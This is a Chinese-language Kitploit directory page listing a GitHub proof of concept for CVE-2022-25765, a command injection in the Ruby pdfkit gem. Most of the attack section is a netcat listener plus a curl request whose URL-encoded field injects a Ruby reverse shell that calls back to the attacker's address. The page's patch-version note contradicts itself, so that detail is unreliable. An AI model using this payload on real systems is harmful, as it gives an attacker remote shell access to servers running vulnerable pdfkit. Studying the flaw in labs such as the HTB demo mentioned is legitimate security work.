Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PDFkit-CMD-Injection — CVE-2022-25765 pdfkit <0.8.6 命令注入。 | Kitploit
工具/GitHubGitHub/shamo0/pdfkit-cmd-injection
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制
GitHubshamo0/pdfkit-cmd-injection

PDFkit-CMD-Injection

CVE-2022-25765 pdfkit <0.8.6 命令注入。

查看仓库
1623年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PDFkit-CMD-Injection 命令注入漏洞

CVE-2022-25765 pdfkit <0.8.6 命令注入漏洞。

pdfkit 包容易受到命令注入攻击,原因是 URL 未进行适当清理。

注意:该问题已在 0.8.7.2 中修补,但后来发现该修补无效。更新后的修补版本为 0.8.7.2。

PoC

启动一个 HTTP 服务器

root@kitploit:~
python3 -m http.server 80

启动一个 netcat 监听器

root@kitploit:~
nc -nlvp 4444

使用 CURL 发送请求

root@kitploit:~
curl 'TARGET_ADDRESS' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: TARGET_ADDRESS' -H 'Connection: keep-alive' -H 'Referer: TARGET_ADDRESS' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'url=http%3A%2F%2FLOCAL-ADDRESS%3ALOCAL-PORT%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22LOCAL-ADDRESS%22%2CLOCAL-PORT%29%29%27%60'

HTB 机器上的演示

screen1.png screen.2.png

参考

  • https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
  • https://vulert.com/vulnerability/rubygems-pdfkit-30907
下载工具